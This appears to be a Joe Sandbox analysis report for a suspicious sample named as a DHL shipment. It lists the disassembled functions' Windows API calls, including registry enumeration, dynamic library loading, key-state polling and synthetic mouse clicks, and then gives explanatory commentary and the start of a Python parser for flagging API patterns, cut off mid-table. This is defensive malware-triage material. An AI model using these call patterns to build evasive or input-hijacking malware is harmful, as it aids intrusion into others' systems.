                                                                                    • Instruction Fuzzy Hash: A72151B5500315DBDB209F69D804AEA77ACFF45724F300B19F9E1D72D0E77098A18761
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0081AC54
                                                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0081ACA8
                                                                                    • __swprintf.LIBCMT ref: 0081ACC1
                                                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,0083F910), ref: 0081ACFF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode$InformationVolume__swprintf
                                                                                    • String ID: %lu
                                                                                    • API String ID: 3164766367-685833217
                                                                                    • Opcode ID: b7f934cfc577aa3fcee37f9822d3578b9e8c24facbb52ff378b5e4c2ec35ead2
                                                                                    • Instruction ID: 32ad98eae76a9eeced8112cca9712fccecea434ef02afa1da15be842aa1fd0e4
                                                                                    • Opcode Fuzzy Hash: b7f934cfc577aa3fcee37f9822d3578b9e8c24facbb52ff378b5e4c2ec35ead2
                                                                                    • Instruction Fuzzy Hash: 00213130A00109EFCB10DB65DD45EEE7BB8FF89714B004469F909DB252DA35EA41DB61
                                                                                    APIs
                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00811B19
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharUpper
                                                                                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                    • API String ID: 3964851224-769500911
                                                                                    • Opcode ID: 4baf3efe87bd2d0eede96cf180ba105bfd30c3b162b692f6c3bb13bc03537075
                                                                                    • Instruction ID: df7ec1a7af1c9e7aa2a315c1d440a8985ceaa89f069413b74e7319abaa35770d
                                                                                    • Opcode Fuzzy Hash: 4baf3efe87bd2d0eede96cf180ba105bfd30c3b162b692f6c3bb13bc03537075
                                                                                    • Instruction Fuzzy Hash: B0115E30900108CFCF00EFA4D8599EEB7B4FF65304F148565D915A7292FB325D0ACB50
                                                                                    APIs
                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0082EC07
                                                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0082EC37
                                                                                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0082ED6A
                                                                                    • CloseHandle.KERNEL32(?), ref: 0082EDEB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                    • String ID:
                                                                                    • API String ID: 2364364464-0
                                                                                    • Opcode ID: c2c00658dc3a4d8636af177ea70d1e44d5dbbb98aae5d32790f9ecae648ca44d
                                                                                    • Instruction ID: 1a784cfbec55aff2811cb0e3d8f1ac77638161f4d93735901a6154ae3e1f6c21
                                                                                    • Opcode Fuzzy Hash: c2c00658dc3a4d8636af177ea70d1e44d5dbbb98aae5d32790f9ecae648ca44d
                                                                                    • Instruction Fuzzy Hash: E5815E716043109FD760EF28D886B6AB7E5EF48710F14881DFAA9DB2D2D674AC40CB96
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                    • String ID:
                                                                                    • API String ID: 1559183368-0
                                                                                    • Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                                                    • Instruction ID: 4b59f49a638ebdae8b62d49a6d8505712e363ea21609fd60e6dd1393a1daa051
                                                                                    • Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                                                    • Instruction Fuzzy Hash: D851E570A00B45DBCB258F69E88466E77B3AF40320F24872BF826963D0D779DDA08B41
                                                                                    APIs
                                                                                      • Part of subcall function 007B7DE1: _memmove.LIBCMT ref: 007B7E22
                                                                                      • Part of subcall function 00830E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0082FDAD,?,?), ref: 00830E31
                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008300FD
                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0083013C
                                                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00830183
                                                                                    • RegCloseKey.ADVAPI32(?,?), ref: 008301AF
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 008301BC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                    • String ID:
                                                                                    • API String ID: 3440857362-0
                                                                                    • Opcode ID: 72b13c6cfa80ba9e905420cb3aab17ecc50b0e81f8932e42d3455d48ee3add93
                                                                                    • Instruction ID: 22e23d73da506a23b55766519c5486860dd6e73b908cff080269fd0eb2013eba
                                                                                    • Opcode Fuzzy Hash: 72b13c6cfa80ba9e905420cb3aab17ecc50b0e81f8932e42d3455d48ee3add93
                                                                                    • Instruction Fuzzy Hash: E1510671208204AFD718EB58C895FAAB7E9FF84314F44892DB595872A2DB35E904CB92
                                                                                    APIs
                                                                                      • Part of subcall function 007B9837: __itow.LIBCMT ref: 007B9862
                                                                                      • Part of subcall function 007B9837: __swprintf.LIBCMT ref: 007B98AC
                                                                                    • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0082D927
                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0082D9AA
                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0082D9C6
                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0082DA07
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0082DA21
                                                                                      • Part of subcall function 007B5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00817896,?,?,00000000), ref: 007B5A2C
                                                                                      • Part of subcall function 007B5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00817896,?,?,00000000,?,?), ref: 007B5A50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                    • String ID:
                                                                                    • API String ID: 327935632-0
                                                                                    • Opcode ID: 5b91974d1ef47489bfdef326b864397ea6c37c7e518bd41eacab91a7ff1fac32
                                                                                    • Instruction ID: c2c6e1fda054381e28e9658c4d17f2ac1e2e5c8abc9d7e13141bafd8dc2393d1
                                                                                    • Opcode Fuzzy Hash: 5b91974d1ef47489bfdef326b864397ea6c37c7e518bd41eacab91a7ff1fac32
                                                                                    • Instruction Fuzzy Hash: D4512775A04219DFCB00EFA8D488AADBBF4FF49314B048065E956AB322D734AD85CF91
                                                                                    APIs
                                                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0081E61F
                                                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0081E648
                                                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0081E687
                                                                                      • Part of subcall function 007B9837: __itow.LIBCMT ref: 007B9862
                                                                                      • Part of subcall function 007B9837: __swprintf.LIBCMT ref: 007B98AC
                                                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0081E6AC
                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0081E6B4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                    • String ID:
                                                                                    • API String ID: 1389676194-0
                                                                                    • Opcode ID: 60894f07db5a09a6e5d56a01f59ab3b9af10d3ec5fe13ba13765f3c09d2db343
                                                                                    • Instruction ID: 2e2810f16b2cca1df9292fc2d6a16de2e21995d96ef377e93b786e36698402aa
                                                                                    • Opcode Fuzzy Hash: 60894f07db5a09a6e5d56a01f59ab3b9af10d3ec5fe13ba13765f3c09d2db343
                                                                                    • Instruction Fuzzy Hash: 82511935A00205DFCB01EF64C985AAEBBF5FF49314F1480A9E919AB362CB35ED51DB50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ca961f68d5935a4db0c6de832d54650059648aa72cabb01ec9b329ada9d774a0
                                                                                    • Instruction ID: 90cc00dde22fdd23951c5eb142145aa98318d8f38aaadd5bbbefeb5618a5955c
                                                                                    • Opcode Fuzzy Hash: ca961f68d5935a4db0c6de832d54650059648aa72cabb01ec9b329ada9d774a0
                                                                                    • Instruction Fuzzy Hash: CD41E435904508EFC718DF28CC98FAABBA8FB89310F140565F996E72E1C7709D41DAD1
                                                                                    APIs
                                                                                    • GetCursorPos.USER32(?), ref: 007B2357
                                                                                    • ScreenToClient.USER32(008757B0,?), ref: 007B2374
                                                                                    • GetAsyncKeyState.USER32(00000001), ref: 007B2399
                                                                                    • GetAsyncKeyState.USER32(00000002), ref: 007B23A7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: AsyncState$ClientCursorScreen
                                                                                    • String ID:
                                                                                    • API String ID: 4210589936-0
                                                                                    • Opcode ID: bd5d8c640284e263f26917ee0c48817d9cb497e93784ad1e2484c03f89b8dd5a
                                                                                    • Instruction ID: df664a0f9d03ec154287715575ae8800b4a6feb5d74a0e7296d092e2850d4c50
                                                                                    • Opcode Fuzzy Hash: bd5d8c640284e263f26917ee0c48817d9cb497e93784ad1e2484c03f89b8dd5a
                                                                                    • Instruction Fuzzy Hash: F1418035A05105FBDF169F69CC48BEDBBB4FB09364F204319F829932A1C7389991DB91
                                                                                    APIs
                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008063E7
                                                                                    • TranslateAcceleratorW.USER32(?,?,?), ref: 00806433
                                                                                    • TranslateMessage.USER32(?), ref: 0080645C
                                                                                    • DispatchMessageW.USER32(?), ref: 00806466
                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00806475
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                                    • String ID:
                                                                                    • API String ID: 2108273632-0
                                                                                    • Opcode ID: 3f73485637427a45b0ee10467f9c0f530486a8e58029902d1895d70d4e16b2ac
                                                                                    • Instruction ID: 61e3a488cc6805dab9182060efc6d269d30029ba2fe7848d72a3b0c0be7ea8e8
                                                                                    • Opcode Fuzzy Hash: 3f73485637427a45b0ee10467f9c0f530486a8e58029902d1895d70d4e16b2ac
                                                                                    • Instruction Fuzzy Hash: 1C31E431900A46AFDBA4CFB4CC89BB67BACFB01314F140165E429C21E1F765D4B9DBA1
                                                                                    APIs
                                                                                    • GetWindowRect.USER32(?,?), ref: 00808A30
                                                                                    • PostMessageW.USER32(?,00000201,00000001), ref: 00808ADA
                                                                                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00808AE2
                                                                                    • PostMessageW.USER32(?,00000202,00000000), ref: 00808AF0
                                                                                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00808AF8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePostSleep$RectWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3382505437-0
                                                                                    • Opcode ID: 028f042a8510fd4054ab341bb3f9ea703cd377042cfa8601a9c90920709c6589
                                                                                    • Instruction ID: 8ac287e5c58d77c99fab69035d7e5394bad8a60e711b9dcb746f10b16b585736
                                                                                    • Opcode Fuzzy Hash: 028f042a8510fd4054ab341bb3f9ea703cd377042cfa8601a9c90920709c6589
                                                                                    • Instruction Fuzzy Hash: 9A310071A00229EFDF00CFA8DD4DA9E3BB5FB44325F10862AF965E61D1C7B09954CB91
                                                                                    APIs
                                                                                    • IsWindowVisible.USER32(?), ref: 0080B204
                                                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0080B221
                                                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0080B259
                                                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0080B27F
                                                                                    • _wcsstr.LIBCMT ref: 0080B289
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                    • String ID:
                                                                                    • API String ID: 3902887630-0
                                                                                    • Opcode ID: d19cc3d5d4cc2af11133c5288420b2abb672c4d8512bf2356d9d6e6ad410d499
                                                                                    • Instruction ID: 8a7d2a2bd34cb9e818e8b8fc403c2609e1db4737a534d54fbf8690c8edfc4ac5
                                                                                    • Opcode Fuzzy Hash: d19cc3d5d4cc2af11133c5288420b2abb672c4d8512bf2356d9d6e6ad410d499
                                                                                    • Instruction Fuzzy Hash: 0A210771604204BBEB655B75DC09E7F7BA8EF99710F00413EF804DA1A1EF65DC4192A0
                                                                                    APIs
                                                                                      • Part of subcall function 007B2612: GetWindowLongW.USER32(?,000000EB), ref: 007B2623
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0083B192
                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0083B1B7
                                                                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0083B1CF
                                                                                    • GetSystemMetrics.USER32(00000004), ref: 0083B1F8
                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00820E90,00000000), ref: 0083B216
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Long$MetricsSystem
                                                                                    • String ID:
                                                                                    • API String ID: 2294984445-0
                                                                                    • Opcode ID: d48e63e0140f9ad15a83fedc20674bd104946cd561fdb8310cb1a7b3c229dbe4
                                                                                    • Instruction ID: aa2f4049c914d3fe094532e888bf864fe08a4d5bf637d03e4ee9742678c47388
                                                                                    • Opcode Fuzzy Hash: d48e63e0140f9ad15a83fedc20674bd104946cd561fdb8310cb1a7b3c229dbe4
                                                                                    • Instruction Fuzzy Hash: 34219FB1A10655EFCB109F389C08A6E3BA4FB85365F114B38FA36D71E1E73098508BD0
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00809320
                                                                                      • Part of subcall function 007B7BCC: _memmove.LIBCMT ref: 007B7C06
                                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00809352
                                                                                    • __itow.LIBCMT ref: 0080936A
                                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00809392
                                                                                    • __itow.LIBCMT ref: 008093A3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$__itow$_memmove
                                                                                    • String ID:
                                                                                    • API String ID: 2983881199-0
                                                                                    • Opcode ID: e117b209cfb10f17f48f48faf9d7c95d5898b0faed2f52acabab197f88846382
                                                                                    • Instruction ID: 4bc70e0e2d111b23c49fc3a90a35881061254cf83144cde20f7ec8016a6b1532
                                                                                    • Opcode Fuzzy Hash: e117b209cfb10f17f48f48faf9d7c95d5898b0faed2f52acabab197f88846382
                                                                                    • Instruction Fuzzy Hash: 9E21C831B01208ABDB109B649C8AEEF7BBDFB98710F055025FA45D73D2E6748D41CB92
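The function records above (an "APIs" list, then "Similarity", then the "Opcode ID") are easier to triage in bulk than by eye: the LoadLibraryW / GetProcAddress / FreeLibrary trio is dynamic import resolution, GetAsyncKeyState is input-state polling, and the PostMessageW pairs with 0x201 / 0x202 are synthetic WM_LBUTTONDOWN / WM_LBUTTONUP clicks. The parser below is an added example, not part of this report or of Joe Sandbox: it reads records in the plugin's text format, attributes each API to the function it appears in (keeping "Part of subcall function" entries apart from direct calls, since those belong to callees), decodes a few window-message constants, and flags per-function patterns. SAMPLE is a constructed excerpt assembled from calls listed on this page; the pattern table is a hypothetical starting point. One caveat for this sample: the report classifies the binary as a compiled AutoIt script, so records like these describe the AutoIt runtime (the LoadLibrary / GetProcAddress / FreeLibrary sequence is consistent with its DllCall implementation), and hits characterise the interpreter rather than the embedded script, which lives in the resource section and is what actually needs analysis.

```python
"""Parse Joe Sandbox IDA-plugin function records and flag API patterns.

Added example, not the report's own tooling. The record layout follows the
listing on this page; SAMPLE is a constructed excerpt built from calls that
appear there. The pattern table and message-constant table are illustrative.
"""
import re
from collections import OrderedDict

# Constructed excerpt: three function records in the plugin's text format.
SAMPLE = """\
APIs
  • Part of subcall function 007B9837: __itow.LIBCMT ref: 007B9862
• LoadLibraryW.KERNEL32(?,?,?,00000000), ref: 0082D927
• GetProcAddress.KERNEL32(00000000,?), ref: 0082D9AA
• FreeLibrary.KERNEL32(00000000,?), ref: 0082DA21
Similarity
• API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
• Opcode ID: 5b91974d1ef47489bfdef326b864397ea6c37c7e518bd41eacab91a7ff1fac32
APIs
• GetCursorPos.USER32(?), ref: 007B2357
• GetAsyncKeyState.USER32(00000001), ref: 007B2399
Similarity
• Opcode ID: bd5d8c640284e263f26917ee0c48817d9cb497e93784ad1e2484c03f89b8dd5a
APIs
• GetWindowRect.USER32(?,?), ref: 00808A30
• PostMessageW.USER32(?,00000201,00000001), ref: 00808ADA
• Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00808AE2
• PostMessageW.USER32(?,00000202,00000000), ref: 00808AF0
Similarity
• Opcode ID: 028f042a8510fd4054ab341bb3f9ea703cd377042cfa8601a9c90920709c6589
"""

# One API line: optional subcall attribution, Name.MODULE, optional (args), ref.
API_RE = re.compile(
    r"^\s*•\s*(Part of subcall function [0-9A-F]+:\s*)?"
    r"([A-Za-z_]\w*)\.([A-Z0-9]+)"
    r"(?:\(([^)]*)\))?"
    r".*?ref:\s*([0-9A-F]+)"
)
OPCODE_RE = re.compile(r"^\s*•\s*Opcode ID:\s*([0-9a-f]{64})")

MESSAGE_APIS = {"SendMessageW", "PostMessageW", "SendMessageA", "PostMessageA"}

# Window-message constants seen in this listing (win32 user32/commctrl values).
WM_NAMES = {
    0x000D: "WM_GETTEXT",
    0x000E: "WM_GETTEXTLENGTH",
    0x0201: "WM_LBUTTONDOWN",
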